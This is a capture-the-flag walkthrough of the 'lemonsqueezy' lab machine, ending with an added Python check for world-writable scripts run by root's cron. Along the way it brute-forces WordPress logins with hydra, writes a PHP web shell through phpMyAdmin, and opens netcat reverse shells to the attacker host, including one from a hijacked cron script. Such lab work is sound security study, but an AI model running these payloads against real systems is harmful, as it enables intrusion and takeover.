Ports
nmap -Pn -p- 192.168.72.173
PORT STATE SERVICE
80/tcp open http
MAC Address: 00:0C:29:B8:2D:FC (VMware)
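Initial foothold
Port 80
The main page is the Apache2 default page and there is no robots.txt, so we go straight to directory scanning.
gobuster dir -u http://192.168.72.173/ -w /usr/share/wordlists/SecLists-master/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html --add-slash
/manual/ (Status: 200) [Size: 626]
/wordpress/ (Status: 200) [Size: 52276]
/javascript/ (Status: 403) [Size: 279]
/phpmyadmin/ (Status: 200) [Size: 10531]
Having found /wordpress/, look at the WordPress home page.
Browsing the home page turns up no sensitive information, so try brute-forcing the login with hydra.
hydra brute force
Capture the login request with Burp and save its request headers to a file named raj. The raj file looks like this: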
Host: lemonsqueezy
User-Agent: Mozilla/5.0 (Hydra Proxy)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://lemonsqueezy/wordpress/wp-login.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 109
Origin: http://lemonsqueezy
Connection: close
Cookie: wordpress_test_cookie=WP+Cookie+check
Upgrade-Insecure-Requests: 1
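Write a Python script that converts the headers from the captured request into hydra header options.
# Convert saved request headers into hydra ":H=" options
file_array = []
file = input("Header file: ")
with open(file, "r") as f:
    for line in f:
        # hydra uses ":" as its field separator, so escape colons inside headers
        file_array.append(":H=" + line.strip().replace(":", "\\:"))
header = ""
for line in file_array:
    header += line
print(header)
Result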
:H=Host\: lemonsqueezy:H=User-Agent\: Mozilla/5.0 (Hydra Proxy):H=Accept\: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8:H=Accept-Language\: en-US,en;q=0.5:H=Accept-Encoding\: gzip, deflate:H=Referer\: http\://lemonsqueezy/wordpress/wp-login.php:H=Content-Type\: application/x-www-form-urlencoded:H=Content-Length\: 109:H=Origin\: http\://lemonsqueezy:H=Connection\: close:H=Cookie\: wordpress_test_cookie=WP+Cookie+check:H=Upgrade-Insecure-Requests\: 1
Brute-forcing usernames with hydra
hydra -L /usr/share/wordlists/SecLists-master/Usernames/top-usernames-shortlist.txt -p 123 lemonsqueezy http-post-form "/wordpress/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2Flemonsqueezy%2Fwordpress%2Fwp-admin%2F&testcookie=1:H=Host\: lemonsqueezy:H=User-Agent\: Mozilla/5.0 (Hydra Proxy):H=Accept\: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8:H=Accept-Language\: en-US,en;q=0.5:H=Accept-Encoding\: gzip, deflate :H=Referer\: http\://lemonsqueezy/wordpress/wp-login.php:H=Content-Type\: application/x-www-form-urlencoded:H=Content-Length\: 109 :H=Origin\: http\://lemonsqueezy:H=Connection\: close:H=Cookie\: wordpress_test_cookie=WP+Cookie+check:H=Upgrade-Insecure-Requests\: 1:Invalid"
The run finds two users, which are saved to usernames.txt:
lemon
orange
Brute-forcing passwords with hydra
hydra -L usernames.txt -P /usr/share/wordlists/SecLists-master/Passwords/500-worst-passwords.txt lemonsqueezy http-post-form "/wordpress/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2Flemonsqueezy%2Fwordpress%2Fwp-admin%2F&testcookie=1:H=Host\: lemonsqueezy:H=User-Agent\: Mozilla/5.0 (Hydra Proxy):H=Accept\: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8:H=Accept-Language\: en-US,en;q=0.5:H=Accept-Encoding\: gzip, deflate :H=Referer\: http\://lemonsqueezy/wordpress/wp-login.php:H=Content-Type\: application/x-www-form-urlencoded:H=Content-Length\: 109 :H=Origin\: http\://lemonsqueezy:H=Connection\: close:H=Cookie\: wordpress_test_cookie=WP+Cookie+check:H=Upgrade-Insecure-Requests\: 1:incorrect"
The password found:
[80][http-post-form] host: lemonsqueezy login: orange password: ginger
Logging in to the admin dashboard
One piece of sensitive information stands out: the post titled "Keep this safe!" contains the following
n0t1n@w0rdl1st!
Logging in to phpMyAdmin
orange n0t1n@w0rdl1st!
Uploading a web shell with a SQL statement
select "<?php system($_GET['a'])?>" into outfile "/var/www/html/wordpress/1.php"
Reverse shell
http://lemonsqueezy/wordpress/1.php?a=nc 192.168.72.162 1234 -e /bin/bash
Privilege escalation
crontab
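The crontab runs the following script:
*/2 * * * * root /etc/logrotate.d/logrotate
In addition, this script has 777 permissions.
Overwrite this file with a reverse shell
echo "mkfifo /tmp/f; nc 192.168.72.162 223 </tmp/f | bash > /tmp/f 2>&1;rm -rf /tmp/f" > /etc/logrotate.d/logrotate
Listen on the attacking host:
nc -nvlp 223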
root
listening on [any] 223 ...
connect to [192.168.72.162] from (UNKNOWN) [192.168.72.173] 59534
id
uid=0(root) gid=0(root) groups=0(root)
whoami
root
cd /root
ls
root.txt
cat root.txt
NvbWV0aW1lcyBhZ2FpbnN0IHlvdXIgd2lsbC4=
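The privilege escalation above depends on one condition: a cron job that runs as root executes a file with 777 permissions. The following check for that condition is an added example, not part of the original write-up; the function name risky_root_cron_targets and the Debian-style crontab paths are assumptions.

```python
import glob
import os
import shlex
import stat


def risky_root_cron_targets(crontab_text):
    """Return (path, mode) for files run by root cron jobs that group/other can write."""
    findings = []
    for raw in crontab_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        # System crontab format: 5 time fields (or one @keyword), user, command.
        parts = line.split(None, 2) if line.startswith("@") else line.split(None, 6)
        if len(parts) < (3 if line.startswith("@") else 7):
            continue  # environment assignments such as MAILTO=root
        user, command = parts[-2], parts[-1]
        if user != "root":
            continue
        try:
            tokens = shlex.split(command)
        except ValueError:  # unbalanced quotes: fall back to a whitespace split
            tokens = command.split()
        # Check every absolute path in the command, e.g. "bash /opt/job.sh".
        for token in tokens:
            if os.path.isabs(token) and os.path.isfile(token):
                mode = stat.S_IMODE(os.stat(token).st_mode)
                if mode & 0o022:  # group- or world-writable
                    findings.append((token, oct(mode)))
    return findings


if __name__ == "__main__":
    # Audit the local system crontab files (paths assume a Debian-style layout).
    for tab in ["/etc/crontab"] + sorted(glob.glob("/etc/cron.d/*")):
        try:
            with open(tab) as f:
                text = f.read()
        except OSError:
            continue
        for path, mode in risky_root_cron_targets(text):
            print(f"{tab}: root runs {path} with mode {mode}")
```

Any file it reports should be owned by root and have its group and other write bits removed.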